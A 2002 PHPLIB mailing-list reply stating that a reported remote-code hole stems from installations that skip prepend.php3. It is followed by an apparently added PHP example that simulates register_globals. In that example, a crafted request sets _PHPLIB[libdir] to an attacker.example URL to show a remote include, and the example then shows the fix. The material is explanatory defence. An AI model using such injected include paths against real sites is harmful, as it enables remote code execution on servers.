Re: [Phplib-users] security hole ... NOT!
From: Richard A. <rh...@ju...> - 2002-03-02 23:55:39
This is not a security flaw in PHPLIB. There was once a problem with _PHPLIB handling, but that was fixed back in July 2001 with the release of 7.2d. The "test cases" described are due to a broken installation of PHPLIB, not a flaw in the library.

To avoid the possibility of remote code being executed on PHPLIB pages, prepend.php3 must be included at the start of any file which uses PHPLIB. It contains the lines:

    $_PHPLIB = array();

    # Can't control your include path?
    # Point this to your PHPLIB base directory. Use a trailing "/"!
    $_PHPLIB["libdir"] = "";

This initialises the include path variable so that it cannot be overridden by crafted form input.

...R.
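As an added illustration (not code from the post above, and not PHPLIB's own code), the following PHP models the mechanism the reply describes: when register_globals turns request parameters into globals, a page that builds its include path from $_PHPLIB["libdir"] without first running prepend.php3 lets a crafted form field choose the directory the library is loaded from; re-initialising the array first, as prepend.php3 does, closes that window. The helper names, the library path, the attacker URL and the request are all constructed for the example; nothing is actually included from disk or the network.

```php
<?php
// Added example, not PHPLIB code. Simulates register_globals and a page that
// derives its include path from $_PHPLIB["libdir"], with and without the
// prepend.php3-style initialisation. Helper names are hypothetical.

// Simulate register_globals=On: every request parameter becomes a global
// variable, including array-valued ones like _PHPLIB[libdir]=...
function simulate_register_globals(array $request): void
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// Model of a PHPLIB-style file: it would do require($_PHPLIB["libdir"] . $file).
// Here it only returns the path it would have loaded, so the effect is visible
// without executing anything.
function resolve_include_path(string $file): string
{
    global $_PHPLIB;
    return ($_PHPLIB["libdir"] ?? "") . $file;
}

// Model of prepend.php3: unconditionally re-initialise the array, so any value
// planted earlier by register_globals is discarded before the first include.
function prepend(): void
{
    global $_PHPLIB;
    $_PHPLIB = array();
    $_PHPLIB["libdir"] = "/var/www/phplib/";   // assumed local path, trailing "/"
}

// Constructed malicious request: a form field named _PHPLIB[libdir].
$request = array("_PHPLIB" => array("libdir" => "http://attacker.example/"));

// Broken installation: page does not include prepend.php3 first.
simulate_register_globals($request);
$broken = resolve_include_path("local.inc");
// $broken is "http://attacker.example/local.inc": a remote include under the
// attacker's control, which is the remote code execution the reply refers to.

// Correct installation: prepend.php3 runs before any other PHPLIB file.
simulate_register_globals($request);
prepend();
$fixed = resolve_include_path("local.inc");
// $fixed is "/var/www/phplib/local.inc".

echo "without prepend: $broken\n";
echo "with prepend:    $fixed\n";
```

The point the example makes is that the protection comes from assignment order, not from a check: prepend.php3 overwrites $_PHPLIB as a whole before any file reads it, so it does not matter what register_globals placed there. A page that includes any other PHPLIB file before prepend.php3 reintroduces the window.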